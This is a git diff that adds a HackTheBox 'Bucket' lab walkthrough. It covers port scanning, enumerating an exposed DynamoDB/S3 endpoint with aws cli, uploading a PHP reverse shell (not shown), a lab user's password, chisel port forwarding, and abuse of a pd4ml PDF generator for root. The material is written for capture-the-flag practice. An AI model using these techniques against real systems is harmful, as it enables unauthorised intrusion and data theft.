diff --git a/HackTheBox/Bucket.md b/HackTheBox/Bucket.md
new file mode 100644
index 0000000..39c7d1a
--- /dev/null
+++ b/HackTheBox/Bucket.md
@@ -0,0 +1,204 @@
+# HackTheBox-Bucket
+
+## Rustscan
+```
+rustscan -a 10.10.10.212 -- -A -sC -sV
+.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
+| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
+| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
+`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
+The Modern Day Port Scanner.
+________________________________________
+: https://discord.gg/GFrQsGy :
+: https://github.com/RustScan/RustScan :
+ --------------------------------------
+Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
+[~] The config file is expected to be at "/root/.rustscan.toml"
+[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
+[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
+Open 10.10.10.212:22
+Open 10.10.10.212:80
+
+PORT STATE SERVICE REASON VERSION
+22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
+80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41
+| http-methods:
+|_ Supported Methods: GET HEAD POST OPTIONS
+|_http-server-header: Apache/2.4.41 (Ubuntu)
+|_http-title: Did not follow redirect to http://bucket.htb/
+Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
+OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
+Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 (94%), ASUS RT-N56U WAP
+(Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%)
+No exact OS matches for host (test conditions non-ideal).
+```
+
+## PORT 80
+
+
+
+It's using a domain name so we are going to add that to `/etc/hosts`
+
+
+
+
+
+Notice that we don't see images , the reason behind it is that it's retreiving the image from `s3.bucket.htb`
+
+
+
+Running `dirsearch` against that
+
+
+
+
+
+If we visit `s3.bucket.htb/shell`
+
+
+
+But adding `/` makes a difference
+
+`s3.bucket.htb/shell/`
+
+
+
+Reading the documentation to list tables
+```
+ var params = {
+ };
+ dynamodb.listTables(params, function(err, data) {
+ if (err) console.log(err, err.stack); // an error occurred
+ else console.log(data); // successful response
+ });
+```
+
+
+
+
+
+
+We have a found a table name `users` , to view the data from the table
+
+```
+var params = {
+ TableName:"users"};
+
+docClient.scan(params, (error, result) => {
+ if (error) {
+ console.log('error', error);
+ } else {
+ console.log(result.Items); // x items
+ }
+});
+
+```
+
+
+
+Tried using these credentials through ssh but failed
+
+
+
+Also running wfuzz on `http://s3.bucket.htb/shell/` didn't returned anything intersting
+
+
+
+So after spending so much time I realized tha I could also list the tables using `aws cli`
+
+
+
+We needed to setup the credentials and the region first also to note that our end point url will be `http://s3.bucket.htb`
+
+
+
+
+
+We can view the tables from here as well
+
+
+
+Honestly did not know what I was doing until I ran aws s3 ls again
+
+
+
+
+
+Here we can see index.html , if we visit `s3.bucket.htb/adserver/index.html`, it will be the same as `bucket.htb` so this means if we upload a php reverse shell on the bucket which is `adserver` we can access that from `bucket.htb`
+
+
+
+That reverse shell is uploaded also keep it my mind to access that quickly because s3 bucket is going to remove it
+
+
+
+We can switch user to `roy` with the password `n2vM-<_K_Q:.Aa2` also if we look for open ports we can find port 8000 is running as http so we can do port forwarding with `chisel`
+
+
+
+On our machine
+
+
+
+On target machine
+
+
+
+
+
+We can also find `bucket-app` in /var/www
+
+
+
+Looking at `index.php` it's using dynamodb client to iterate contents of `alerts` table and then reading it and storing it to a pdf using `pd4ml` which converts html and css to pdf
+
+So we need to create a table first
+
+```
+aws dynamodb create-table \
+ --table-name alerts \
+ --attribute-definitions \
+ AttributeName=title,AttributeType=S \
+ AttributeName=data,AttributeType=S \
+ --key-schema \
+ AttributeName=title,KeyType=HASH \
+ AttributeName=data,KeyType=RANGE \
+--provisioned-throughput \
+ ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url 'http://s3.bucket.htb'
+```
+
+
+
+
+
+Now we need to insert the data
+
+```
+aws dynamodb put-item \
+ --table-name alerts \
+ --item '{
+ "title": {"S": "Ransomware"},
+ "data": {"S": ""}
+ }' \
+ --return-consumed-capacity TOTAL --endpoint-url http://s3.bucket.htb
+```
+
+
+
+
+
+Now doing a POST request with `action=get_alerts`
+
+`curl --data "action=get_alerts" -X POST http://127.0.0.1:8000`
+
+
+
+Note : The converted pdf file will get removed also the table so you need to be quick here to get the file
+
+I started a python http server
+
+
+
+
+
+And we got the root flag , although I was able to get the private ssh key but couldn't make it in a proper format so I just left having a root hash
\ No newline at end of file